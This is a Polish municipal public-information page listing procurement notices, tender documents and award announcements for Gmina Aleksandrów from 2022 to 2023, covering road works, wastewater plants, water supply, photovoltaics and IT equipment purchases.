Przetargi

Przetargi

get

 

Opublikowane przez: Karolina Grzybowska | Data wprowadzenia: 2023-10-24 01:12:38 | Data modyfikacji: 2023-10-24 01:23:13.
Plan postepowań o udzielenie zamówień
 
plan postepowan o udzelenie zamowien 5 10 2023.pdf

Opublikowane przez: Administrator BIP Administrator BIP | Data wprowadzenia: 2023-10-05 11:12:20 | Data modyfikacji: 2023-10-24 01:23:13.
Wykaz nieruchomości przeznaczonych do dzierżawy
 
Wykaz do pobrania tutaj >>

Opublikowane przez: Administrator BIP Administrator BIP | Data wprowadzenia: 2023-09-27 09:35:08 | Data modyfikacji: 2023-10-24 01:23:13.
Zapytanie ofertowe - nadzór inwestorski nad
zadaniem pn.: "Budowa przydomowych oczyszczalni
ścieków na terenie Gminy Aleksandrów Etap IV"

Zapytanie dotyczace nadzoru do pobrania tutaj >>

Formularz ofertowy

 

Opublikowane przez: Administrator BIP Administrator BIP | Data wprowadzenia: 2023-08-18 11:12:16 | Data modyfikacji: 2023-08-18 12:57:57.
Zaktualizowany plan postępowań na 2023 rok
 
Zaktualizowany plan do pobrania tutaj >>

Opublikowane przez: Administrator BIP Administrator BIP | Data wprowadzenia: 2023-07-18 11:41:48 | Data modyfikacji: 2023-08-18 12:57:57.
Plan postepowań o udzieleniu zamówień na rok
2023
 
Plan do pobrania tutaj

Opublikowane przez: Karolina Grzybowska | Data wprowadzenia: 2023-07-03 09:21:07 | Data modyfikacji: 2023-08-18 12:57:57.
Wykaz lokali użytkowych przeznaczonych do oddania
w najem
 
Wykaz lokali do pobrania tutaj >>

Opublikowane przez: Administrator BIP Administrator BIP | Data wprowadzenia: 2023-06-21 10:58:27 | Data modyfikacji: 2023-08-18 12:57:57.
Zapytanie ofertowe - nadzór inwestorski nad
zadaniem pn.: Budowa sieci wodociągowej w
miejscowości Rożenek
 
Zapytanie dotyczące nadzoru inwestorskiego do pobrania tutaj >>

Opublikowane przez: Administrator BIP Administrator BIP | Data wprowadzenia: 2023-05-11 14:06:27 | Data modyfikacji: 2023-05-11 14:07:40.
Zaktualizowany plan postępowań na 2023 rok
 
Plan postępowań do pobrania tutaj >>

Opublikowane przez: Administrator BIP Administrator BIP | Data wprowadzenia: 2023-04-27 15:06:29 | Data modyfikacji: 2023-05-11 14:07:40.
Zapytanie ofertowe o cenę usługi pełnienia
nadzoru inwestorskiego zadania - Wykoanie
instalacji fotowoltaicznych na potrzeby budynków
użyteczności publicznej oraz budowa i rozbudowa
oświetlenia ulicznego w gminie Aleksandrów -
Rządowy Fundusz Polski Ład
 
Zapytanie dotyczące fotowoltaiki do pobrania tutaj >>

Opublikowane przez: Administrator BIP Administrator BIP | Data wprowadzenia: 2023-03-28 17:37:09 | Data modyfikacji: 2023-05-11 14:07:40.
Zapytanie ofertowe o cenę usługi pełnienia
kompleksowego nadzoru inwestorskiego zadania pn.
"Rozbudowa budynku Szkoły Podstawowej w
Skotnikach o salę gminastyczną wraz z
instalacjiami i niezbędną infrastrukturą
techniczną oraz wykonanie utwardzenia terenu -
Rządowy Fundusz Polski Ład"
 
Zapytanie ofertowe dotyczace Sali Gminastycznej pobrania tutaj >>

Opublikowane przez: Administrator BIP Administrator BIP | Data wprowadzenia: 2023-02-16 15:46:33 | Data modyfikacji: 2023-05-11 14:07:40.
Zapytanie ofertowe o cenę wykonania usługi
koparko - ładowarką oraz samochdem
samowyładowczym
 
Zapytanie dotyczące usługi koparką do pobrania tutaj >>

Opublikowane przez: Administrator BIP Administrator BIP | Data wprowadzenia: 2023-02-06 11:53:02 | Data modyfikacji: 2023-05-11 14:07:40.
Plan postępowań na 2023 rok
 
Paln postępowań do pobrania tutaj >>

Opublikowane przez: Administrator BIP Administrator BIP | Data wprowadzenia: 2023-01-11 08:37:23 | Data modyfikacji: 2023-05-11 14:07:40.
Zapytanie ofertowe o cenę "Zapewnienia
całodobowej gotowości do podjęcia działań
związanych z opieką weterynaryjną w przypadkach
zdarzeń drogowych z udziałem zwierzą na terenie
Gminy Aleksandrów"
 
Zapytanie dotyczące opieki weterynaryjnej do pobrania tutaj

Opublikowane przez: Administrator BIP Administrator BIP | Data wprowadzenia: 2023-01-09 14:57:03 | Data modyfikacji: 2023-05-11 14:07:40.
Zapytanie ofertowe - zakup paliw płynnych dla
jednostek OSP
 
Zapytanie dotyczące paliw pobrania tutaj >>

Opublikowane przez: Administrator BIP Administrator BIP | Data wprowadzenia: 2022-12-28 10:55:47 | Data modyfikacji: 2023-05-11 14:07:40.
Zawiadomienie o wyborze najkorzystniejszej oferty
- Poprawa bezpieczeństwa ruchu drogowego w
województwie łódzkim na DK 74 w m. Jaksonek
 
Zawiadomienie dotyczące poprawy bezpieczeństwa do pobrania tutaj >>

Opublikowane przez: Administrator BIP Administrator BIP | Data wprowadzenia: 2022-12-22 13:20:19 | Data modyfikacji: 2023-05-11 14:07:40.
Zapytanie ofertowe - o cenę usługi koserwacji
oświetlenia ulicznego na terenie gminy
Aleksandrów w roku 2023
 
Zapytanie dotyczace konserwacji oświetlenia ulicznego do pobrania tutaj >>

Opublikowane przez: Administrator BIP Administrator BIP | Data wprowadzenia: 2022-12-20 15:56:04 | Data modyfikacji: 2023-05-11 14:07:40.
Zapytanie ofertowe - o cenę zimowego utrzymania
dróg na terenie gminy Aleksandrów w roku 2023
 
Zapytanie dotyczące utrzymania dróg do pobrania tutaj >>

Opublikowane przez: Administrator BIP Administrator BIP | Data wprowadzenia: 2022-12-19 11:18:42 | Data modyfikacji: 2023-05-11 14:07:40.
Obwieszczenie Regionalnego Dyrektora Ochrony
Środowiska w Kielcach dotyczące ustanowienia
planu zadań ochronnych dla obszaru Natura 2000
Dolina Czarnej
 
Obwieszczenie dotyczace Czarnej do pobrania tutaj >>

Opublikowane przez: Administrator BIP Administrator BIP | Data wprowadzenia: 2022-12-09 12:17:59 | Data modyfikacji: 2023-05-11 14:07:40.
Zapytanie ofertowe o cenę dostawy 60 pelletu
drzewnego dla potrzeb Zespołu Szkolno -
Przedszkolnego w Dąbrowie nad Czarną
 
Zapytanie dotyczące pelletu do pobrania tutaj >>

Opublikowane przez: Administrator BIP Administrator BIP | Data wprowadzenia: 2022-12-09 09:09:19 | Data modyfikacji: 2023-05-11 14:07:40.
Informacja z otwarcia ofert - Poprawa
bezpieczeństwa ruchu drogowego w województwie
łódzkim na DK 74 w m. Jaksonek
 
Informacja z otwarcia ofert dotyczących poprawy bezpieczeństwa do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2022-11-28 13:34:48 | Data modyfikacji: 2023-05-11 14:07:40.
Informacja o kwocie, jaką zamierza przeznaczyć
Zamawiający na sfinansowanie zamówienia
 
Informacja o kwocie do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2022-11-28 10:47:22 | Data modyfikacji: 2023-05-11 14:07:40.
Ogłoszenie o zmianie ogłoszenia - Poprawa
bezpieczeństwa ruchu drogowego w województwie
łódzkim na DK 74 w m. Jaksonek

Ogłoszenie o zmienie ogłoszenia

Specyfikacja Warunków Zamówienia

Wyjaśnienie treści SIWZ

Załącznik Nr 1a - tabela wyceny etapów

Załącznik Nr 7 - umowa

 

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2022-11-22 16:51:06 | Data modyfikacji: 2023-05-11 14:07:40.
Zapytanie ofertowe o cenę urządzeń do
kancelarii Urzędu Gminy w Aleksandrowie w ramach
projektu grantowego Cyfrowa Gmina- dofinansowanie
w ramach Programu Operacyjnego Polska Cyfrowa na
lata 2014-2020.
 
Zapytanie do pobrania tutaj

Opublikowane przez: Karolina Grzybowska | Data wprowadzenia: 2022-11-18 12:01:19 | Data modyfikacji: 2022-11-18 12:03:19.
Ogłoszenie o zamówieniu usługi - „Poprawa
bezpieczeństwa ruchu drogowego w województwie
łódzkim na DK 74 w m. Jaksonek”

Ogłoszenie o zamówieniu

Specyfikacja Warunków Zamówienia

Załącznik Nr 1 do SWZ - oferta

Załącznik 1a do SWZ - tabela wyceny etapów

Załącznik Nr 2 do SWZ - warunki udziału

Załącznik Nr 3 do SWZ - wykluczenie

Załącznik Nr 4 do SWZ - zobowiązanie do udostępnienia zasobów

Załącznik Nr 4a do SWZ - oświadczenie wykonawców wspólnie ubiegających

Załącznik Nr 5 do SWZ - wykaz osób

Załącznik Nr 6 do SWZ - wykaz usług

Załącznik Nr 7 do SWZ - umowa

Załącznik Nr 8 do SWZ - oświadczenie o aktualności

Załącznik Nr 9 do SWZ - Opis Przedmiotu Zamówienia

Załącznik Nr 10 do SWZ - grupa kapitałowa

Załącznik Nr 11 do SWZ - ID postępowania

Załącznik Nr 2 do OPZ

 

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2022-11-16 17:21:54 | Data modyfikacji: 2022-11-18 12:03:19.
Zapytanie ofertowe o cenę opracowania Programu
Funkcjonalno-Użytkowego dla projektu
realizowanego w ramach Rządowego Funduszu Polski
Ład Program Inwestycji Strategicznych na
realizację zadania inwestycyjnego pn. "Wykonanie
instalacji fotowoltaicznej na potrzeby budynków
użyteczności publicznej oraz budowa i rozbudowa
oświetlenia ulicznego w Gminie Alekandrów -
Rządowy Fundusz Polski Ład""
 
Zapytanie dotyczące fotowoltaiki do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2022-10-25 14:41:30 | Data modyfikacji: 2022-11-18 12:03:19.
Zawiadomienie o wyborze najkorzystniejszej oferty
- Remont drogi powiatowej Nr DP 1502E Sulejów -
Kawęczyn - Krasik
 
Zawiadomienie dotyczące remontu drogi powiatowej do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2022-09-30 13:42:00 | Data modyfikacji: 2022-11-18 12:03:19.
Zawiadomienie o wyborze najkorzystniejszej oferty
- Budowa przydomowych oczyszczalni ścieków na
terenie Gminy Aleksandrów - Etap III
 
Zawiadomienie dotyczące oczyszczalni do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2022-09-30 12:59:33 | Data modyfikacji: 2022-09-30 13:29:00.
Wykaz nieruchomości przeznaczonych do dzierżawy
 
Wykaz nieruchomości przeznaczony do dzierżawy do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2022-09-23 14:05:48 | Data modyfikacji: 2022-09-30 13:29:00.
Ogłoszenie o zamiarze przeprowadzenia
postępowania o udzielenie zamówienia na wybór
operatora świadczącego usługu w zakresie
publicznego transportu zbiorowego w trybie
bezpośredniego zawarcia umowy
 
Ogłoszenie dotyczące transportu zbiorowego do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2022-09-16 12:22:15 | Data modyfikacji: 2022-09-30 13:29:00.
Zapytanie ofertowe na zakup urządzenia klasy UTM
w ramach projektu grantowego Cyfrowa Gmina -
dofinansowanie w ramach Programu Operacyjnego
Polska Cyfrowa na lata 2014-2020
 
Zapytanie dotyczące UTM do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2022-09-14 13:36:31 | Data modyfikacji: 2022-09-14 13:39:09.
Wykaz nieruchomości przeznaczonych do dzierżawy
 

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2022-08-29 11:58:18 | Data modyfikacji: 2022-09-14 13:39:09.
Informacja z otwarcia ofert- „Budowa
przydomowych oczyszczalni ścieków na terenie
Gminy Aleksandrów Etap III"
 
Informacja do pobrania tutaj

Opublikowane przez: Karolina Grzybowska | Data wprowadzenia: 2022-08-08 12:32:56 | Data modyfikacji: 2022-09-14 13:39:09.
Informacja o kwocie, jaką zamierza przeznaczyć
Zamawiający na sfinansowanie
zamówienia-„Budowa przydomowych oczyszczalni
ścieków na terenie Gminy Aleksandrów Etap III
 
Informacja do pobrania tutaj

Opublikowane przez: Karolina Grzybowska | Data wprowadzenia: 2022-08-08 10:50:29 | Data modyfikacji: 2022-09-14 13:39:09.
Informacja z otwarcia ofert- „Remont drogi
powiatowej Nr DP 1502E Sulejów-Kawęczyn- Krasik
 
Informacja do pobrania tutaj

Opublikowane przez: Karolina Grzybowska | Data wprowadzenia: 2022-08-04 11:59:36 | Data modyfikacji: 2022-09-14 13:39:09.
Informacja o kwocie, jaką zamierza przeznaczyć
Zamawiający na sfinansowanie zamówienia -
„Remont drogi powiatowej Nr DP 1502E
Sulejów-Kawęczyn- Krasik ”
 
Informacja do pobrania tutaj

Opublikowane przez: Karolina Grzybowska | Data wprowadzenia: 2022-08-04 10:30:37 | Data modyfikacji: 2022-08-04 10:31:46.
Ogłoszenie o zamówieniu - Roboty budowlane
„Budowa przydomowych oczyszczalni ścieków na
terenie Gminy Aleksandrów Etap III”

Ogłoszenie o zamówieniu >>

Specyfikacja Warunków Zamówienia >>

Załącznik Nr 1 do SWZ - formularz ofertowy

Załącznik Nr 2 do SWZ - warunki udziału >>

Załącznik Nr 3 do SWZ - przesłanki do wykluczenia >>

Załącznik Nr 4 do SWZ - oświadczenie o grupie kapitałowej >>

Załącznik Nr 5 do SWZ - wykaz osób >>

Załącznik Nr 6 do SWZ - wykaz robót >>

Załacznik Nr 7 do SWZ - projekt umowy >>

Załącznik Nr 8 do SWZ - PFU >>

Załącznik Nr 9 do SWZ - zobowiązanie do udostępnienia zasobów >>

Załącznik Nr 10 do SWZ - oświadczenie o aktualności >>

Załącznik Nr 11 do SWZ - oświadczenie >>

Załącznik Nr 12 do SWZ - ID postępowania >>

 

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2022-07-21 14:12:13 | Data modyfikacji: 2022-08-04 10:31:46.
Ogłoszenie o zamówieniu Roboty budowlane
„Remont drogi powiatowej Nr DP 1502E
Sulejów-Kawęczyn-Krasik”

Ogłoszenie o zamówieniu >>

Specyfikacja Warunków Zamówienia >>

Załącznik Nr 1 do SWZ - formularz ofertowy

Załącznik Nr 2 do SWZ - warunki udziału

Załącznik Nr 3 do SWZ - przesłanki do wykluczenia

Załącznik Nr 4 do SWZ - oświadczenie o grupie kapitałowej

Załącznik Nr 5 do SWZ - wykaz osób

Załącznik Nr 6 do SWZ - wykaz robót

Załacznik Nr 7 do SWZ - projekt umowy

Załącznik Nr 8 do SWZ - dokumentacja projektowa

Załącznik Nr 9 -do SWZ - zobowiązanie do udostępnienia zasobów

Załącznik Nr 10 do SWZ - oświadczenie o aktualności

Załącznik Nr 11 do SWZ - oświadczenie

Załącznik Nr 12 do SWZ - ID postępowania

 

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2022-07-20 11:19:58 | Data modyfikacji: 2022-08-04 10:31:46.
Zaktualizowany plan postępowań u udzielenie
zamówień na 2022 rok
 
Aktualny plan postępowań do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2022-07-11 11:23:14 | Data modyfikacji: 2022-08-04 10:31:46.
Zapytanie ofertowe - dostawa serwera w ramach
projektu grantowego Cyforwa Gmina - dofinansowanie
w ramch Programu Operacyjnego Polska Cyfrowa na
lata 2014-2020
 
Zapytanie dotyczące serwera do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2022-07-06 10:47:50 | Data modyfikacji: 2022-08-04 10:31:46.
Zapytanie ofertowe - dostawa serwera w ramach
projektu grantowego Cyforwa Gmina - dofinansowanie
w ramch Programu Operacyjnego Polska Cyfrowa na
lata 2014-2020
 
Zapytanie do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2022-06-23 11:51:56 | Data modyfikacji: 2022-08-04 10:31:46.
Zawiadomienie o wyborze najkorzystniejszej
oferty- „ Odbiór i zagospodarowanie odpadów
komunalnych z terenu gminy Aleksandrów ”
 
Zawiadomienie do pobrania tutaj

Opublikowane przez: Karolina Grzybowska | Data wprowadzenia: 2022-05-31 15:54:43 | Data modyfikacji: 2022-08-04 10:31:46.
Zapytanie ofertowe - zwracam się z zapytaniem o
cenę - 6 szt stacji roboczych w ramach projektu
Cyfrowa Gminy - dofinansowanie w ramach Programu
Operacyjnego Polska Cyfrowa na lata 2014-2020
 
Zapytanie dot. ofert na komputery pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2022-05-20 15:04:23 | Data modyfikacji: 2022-05-20 15:08:31.
Zawiadomienie o wyborze najkorzystniejszej
oferty- „Magia Pilicy – Ochrona Przyrody
Obszaru Funkcjonalnego Doliny Rzeki Pilicy”
 
Zawiadomienie do pobrania tutaj

Opublikowane przez: Karolina Grzybowska | Data wprowadzenia: 2022-05-19 15:42:24 | Data modyfikacji: 2022-05-20 15:08:31.
Informacja z otwarcia ofert - Odbiór i
zagospodarowanie odpadów komunalnych z terenu
gminy Aleksandrów
 
Infomacja z otwarcia ofert do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2022-05-13 13:25:04 | Data modyfikacji: 2022-05-13 13:42:35.
Informacja o kwocie, jaką zamierza przeznaczyć
Zamawiający na sfinansowanie zamówienia -
Odbiór i zagospodarowanie odpadów komunalnych z
terenu gminy Aleksandrów
 
Informacja o kwocie do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2022-05-13 10:29:27 | Data modyfikacji: 2022-05-13 13:42:35.
Wyjaśnienie treści SWZ - Odbiór i
zagospodarowanie odpadów komunalnych z terenu
Gminy Aleksandrów
 
Wyjasnienie treści SWZ dotyczące odpadów do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2022-05-11 12:18:46 | Data modyfikacji: 2022-05-11 12:32:10.
Ogłoszenie o zamówieniu Usługi „Odbiór i
zagospodarowanie odpadów komunalnych z terenu
gminy Aleksandrów”

Ogłoszenie o przetargu do pobrania tutaj

SWZ do pobrania tutaj

Załącznik nr 1 do SWZ- Szczegółowy opis przedmiotu zamówienia

Załącznik nr 2 do SWZ- wzór formularza ofertowego

Załącznik nr 3 do SWZ- wzór oświadczenia o spełnianiu warunków udziału w postępowaniu

Załącznik nr 4 do SWZ- wzór oświadczenia o braku podstaw do wykluczenia z postępowania

Załącznik nr 5 do SWZ- wzór informacji do grupy kapitałowej

Załącznik nr 6 do SWZ- wzór wykazu narzędzi

Załącznik nr 7 do SWZ- projekt umowy

Załącznik nr 8 do SWZ- zobowiązanie do udostępnienia zasobów

Załącznik nr 9 do SWZ- oświadczenie o aktualności

Załacznik nr 10 do SWZ- oświadczenie wspólnie ubiegających się o udzielenie zamówienia

Załącznik nr 11 do SWZ- ID postępowania

Załącznik nr 12 do SWZ- Uchwała Nr XIV1042020

Załącznik nr 13 do SWZ- Uchwała nr XXXVI2402022

Załącznik nr 14 do SWZ- Uchwała Nr XIV1062020

Załacznik nr 15 do SWZ- Uchwała Nr XXXVI2392022

Załącznik nr 16 do SWZ

 

Opublikowane przez: Karolina Grzybowska | Data wprowadzenia: 2022-05-05 15:45:35 | Data modyfikacji: 2022-05-11 12:32:10.
Informacja z otwarcia ofert - Magia Pilicy –
Ochrona Przyrody Obszaru Funkcjonalnego Doliny
Rzeki Pilicy
 
Informacja z otwarcia ofert do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2022-04-27 13:21:24 | Data modyfikacji: 2022-05-11 12:32:10.
Informacja o kwocie jaką zamierza przeznaczyć
Zamawiający na sfinansowanie zamówienia - Magia
Pilicy - Ochrona Przyrody Obszaru Funkcjonalnego
Doliny Rzeki Pilicy
 
Informacja o kwocie do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2022-04-27 10:56:50 | Data modyfikacji: 2022-05-11 12:32:10.
Zawiadomienie o wyborze najkorzystniejszej oferty
- Budowa i modernizacja infrastruktury drogowej na
terenie gminy Aleksandrów Rządowy Fundusz Polski
Ład
 
Zawiadomienie o wyborze oferty do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2022-04-25 15:45:52 | Data modyfikacji: 2022-05-11 12:32:10.
Zapytanie ofertowe - usługa sprawowania nadzoru
inwestorskiego podczas realizacji zadania
inwestycyjnego pn.: "Budowa i modernizacja
infrastruktury drogowej na terenie gminy
Aleksandrów - Rządowy Fundusz Polski Ład"
 
Zapytanie dotyczące nadozru nad modrnizacją dróg do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2022-04-19 13:22:06 | Data modyfikacji: 2022-05-11 12:32:10.
Zapytanie ofertowe - usługa pełnienia
kompleksowego nadzoru inwestorskiego zadania pn.
"Budowa nowego ujęcia wody wraz z modernizacją
ujęć istniejących celem zapewnienia wody dla
mieszkańców Gminy Aleksandrów - Rządowy
Fundusz Polski Ład"
 
Zapytanie dotyczące nadzoru inwestorskiego do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2022-04-19 13:16:23 | Data modyfikacji: 2022-05-11 12:32:10.
Ogłoszenie o zamówieniu - Magia Pilicy –
Ochrona Przyrody Obszaru Funkcjonalnego Doliny
Rzeki Pilicy

Ogłoszenie o przetargu do pobrania tutaj >>

SWZ do pobrania tutaj >>

Załącznik Nr 1 do SWZ - formularz ofertowy

Załącznik Nr 2 do SWZ - warunki udziału

Załącznik Nr 3 do SWZ - przesłanki do wykluczenia

Załącznik Nr 4 do SWZ - oświadczenie o nie przynalezności do grupy kapitałowej

Załącznik Nr 5 do SWZ - wykaz osób

Załącznik Nr 6 do SWZ - oświadczenie o aktualności

Załącznik Nr 7 do SWZ - umowa

Załącznik Nr 8 do SWZ - zobowiązanie do udostępnienia zasobów

Załącznik Nr 9 do SWZ - oświadczenie wykonawców wspólnie ubiegających się

Załączniek Nr 10 do SWZ - projekt

Załącznik Nr 11 do SWZ - przedmiar

Załącznik Nr 12 do SWZ - specyfikacja techniczna

Załącznik Nr 13 do SWZ - ID postępowania

 

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2022-04-11 15:24:29 | Data modyfikacji: 2022-05-11 12:32:10.
Zawiadomienie o wyborze najkorzystniejszej oferty
- Budowa nowego ujęcia wody wraz z modernizacją
ujęć istniejących celem zapewnienia wody dla
mieszkańców Gminy Aleksandrów - Rządowy
Fundusz Polski Ład
 
Zawiadomienie do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2022-04-08 14:53:52 | Data modyfikacji: 2022-05-11 12:32:10.
Informacja z otwarcia ofert - Budowa nowego
ujęcia wody wraz z modernizacją ujęć
istniejących celem zapewnienia wody dla
mieszkańców Gminy Aleksandrów
 
Informacja z otwarcia ofert do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2022-03-18 12:42:58 | Data modyfikacji: 2022-05-11 12:32:10.
Informacja o kwocie jaką zamawiający zamierza
przeznaczyć na sfinansowanie przedsięwzięcia -
Budowa nowego ujęcia wody wraz z modernizacją
ujęć istniejących celem zapewnienia wody dla
mieszkańców Gminy Aleksandrów - Rządowy
Fundusz Polski Ład
 
Informacja o kwocie do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2022-03-18 10:59:07 | Data modyfikacji: 2022-03-18 11:00:20.
Informacja z otwarcia ofert - Budowa i
modernizacja infrastruktury drogowej na terenie
gminy Aleksandrów - Rządowy Fundusz Polski Ład
 
Informacja z otwarcia ofert do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2022-03-17 13:18:00 | Data modyfikacji: 2022-03-18 11:00:20.
Informacja o kwocie jaką zamawiający zamierza
przeznaczyć Zamawiający na sfinansowanie
zamówienia - Budowa i modernizacja infrastruktury
drogowej na terenie gminy Aleksandrów - Rządowy
Fundusz Polski Ład
 
Informacja o kwocie do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2022-03-17 11:00:30 | Data modyfikacji: 2022-03-18 11:00:20.
Zawiadomenie o wyborze najkorzystniejszej oferty -
Remont dachu na budynku użyteczności publicznej
w miejscowości Niewierszyn
 
Dokument o wyborze oferty do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2022-03-15 16:06:48 | Data modyfikacji: 2022-03-18 11:00:20.
Zawiadomienie o odrzuceniu i unieważnieniu -
Poprawa bezpieczeństwa ruchu drogowego w
województwie łódzkim na DK 74 w m. Jaksonek
 
Dokument o unieważnieniu do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2022-03-15 16:05:00 | Data modyfikacji: 2022-03-18 11:00:20.
Informacja z otwarcia ofert - Poprawa
bezpieczeństwa ruchu drogowego w województwie
łódzkim na DK 74 w m. Jaksonek
 
Informacja z otwarcia ofert do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2022-03-07 12:40:29 | Data modyfikacji: 2022-03-18 11:00:20.
Informacja o kwocie jaką zamierza przeznaczyć
Zamawiający na sfinansowanie zamówienia -
Poprawa bezpieczeństwa ruchu drogowego w
województwie łódzkim na DK 74 w m. Jaksonek
 
Informacja o kwocie do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2022-03-07 10:58:38 | Data modyfikacji: 2022-03-18 11:00:20.
Ogłoszenie o zamówieniu - Budowa nowego ujęcia
wody wraz z modernizacją ujęć istniejących
celem zapewnienia wody dla mieszkańców Gminy
Aleksandrów – Rządowy Fundusz Polski Ład

Ogłoszenie o zamówieniu

Specyfikacja Warunków Zamówienia

Załącznik Nr 1 do SWZ - oferta

Załącznik Nr 2 do SWZ - warunki udziału

Załącznik Nr 3 do SWZ - wykluczenie

Załącznik Nr 4 do SWZ - grupa kapitałowa

Załącznik Nr 5 do SWZ - wykaz osób

Załącznik Nr 6 do SWZ - wykaz robót

Załącznik Nr 7 do SWZ - projekt umowy

Załącznik Nr 8 do SWZ - PFU

Załącznik Nr 9 do SWZ - zobowiązanie do udostępnienia zasobów

Załącznik Nr 10 do SWZ - oświadczenie o aktualności

Załącznik Nr 11 do SWZ - oświadczenie

Załącznik Nr 12 do SWZ - ID postępowania

 

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2022-03-03 15:37:23 | Data modyfikacji: 2022-03-18 11:00:20.
Ogłoszenie o zamówieniu - Budowa i modernizacja
infrastruktury drogowej na terenie gminy
Aleksandrów – Rządowy Fundusz Polski Ład

Ogloszenie o zamówieniu

Specyfikacja Warunków Zamówienia >>

Załącznik Nr 1 do SWZ - formularz ofertowy

Załącznik Nr 2 do SWZ - warunki udziału

Załącznik Nr 3 do SWZ - przesłanki do wykluczenia

Załącznik Nr 4 do SWZ - oświadczenie o grupie kapitałowej

Załącznik Nr 5 do SWZ - wykaz osób

Załącznik Nr 6 do SWZ - wykaz robót

Załacznik Nr 7 do SWZ - projekt umowy

Załącznik Nr 8 do SWZ - PFU

Załącznik Nr 9 -do SWZ - zobowiązanie do udostępnienia zasobów

Załącznik Nr 10 do SWZ - oświadczenie o aktualności

Załącznik Nr 11 do SWZ - oświadczenie

Załącznik Nr 12 do SWZ - ID postępowania

 

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2022-03-02 15:03:44 | Data modyfikacji: 2022-03-18 11:00:20.
Plan postępowań o udzielenie zamówień
 
Plan postępowań do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2022-03-02 12:25:43 | Data modyfikacji: 2022-03-18 11:00:20.
Informacja z otwarcia ofert - - Remont dachu na
bydynku użyteczności publicznej w miejscowości
Niewierszyn
 
Informacja z otwarcia ofert do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2022-03-01 13:42:14 | Data modyfikacji: 2022-03-18 11:00:20.
Informacja o kwocie jaką zamierza przeznaczyć
Zamawiający na sfinansowanie zamówienia - Remont
dachu na budynku użyteczności publicznej w
miejscowości Niewierszyn
 
Informacja o kwocie do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2022-03-01 10:29:08 | Data modyfikacji: 2022-03-18 11:00:20.
Ogłoszenie o zamówieniu - Poprawa
bezpieczeństwa ruchu drogowego w województwie
łódzkim na DK74 w m. Jaksonek

Ogłoszenie o zamówieniu

Specyfikacja Warunków Zamówienia >>

Załącznik Nr 1 do SWZ - formularz ofertowy

Załącznik 1a do formularza ofertowego - Tabela wyceny etapów

Załącznik Nr 2 do OPZ

Załącznik Nr 2 do SWZ - warunki udziału

Załącznik Nr 3 do SWZ - przesłanki do wykluczenia

Załącznik Nr 4 do SWZ - Zobowiązanie do udostępnienia zasobów

Załacznik Nr 4a do SWZ - Oświadczenie wykonawców wspólnie ubiegających

Załącznik Nr 5 do SWZ - wykaz osób

Załącznik Nr 6 do SWZ - wykaz usług

Załącznik Nr 7 do SWZ - umowa

Załącznik Nr 8 do SWZ - oświadczenie o aktualności

Załącznik Nr 9 do SWZ - opis przedmiotu

Załącznik Nr 10 do SWZ - ID postępowania

 

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2022-02-25 14:50:17 | Data modyfikacji: 2022-03-18 11:00:20.
Zawiadomienie o unieważnieniu postępowania -
Poprawa bezpieczeństwa ruchu drogowego w
województwie łódzkim na DK74 w m. Jaksonek
 
Zawiadomienie o unieważnieniu postępowania do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2022-02-24 11:53:24 | Data modyfikacji: 2022-02-24 11:54:07.
Ogłoszenie o zamówieniu Usługi „Poprawa
bezpieczeństwa ruchu drogowego w województwie
łódzkim na DK 74 w m. Jaksonek"

Ogloszenie o zamówieniu

Specyfikacja warunków zamówienia

Załącznik 4a Oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia

Załącznik 4 Zobowiązanie podmiotu udostępniającego zasoby

Załącznik 1 Formularz ofertowy

Załącznik 1a Tabela wyceny etapów

Załącznik 2 Warunki udziału

Załącznik 3 Wykluczenie

Załącznik 5 Wykaz osób

Załacznik 6 Wykaz usług

Załącznik 7 Projekt umowy

Załacznik 8 Oświadczenie o aktualności

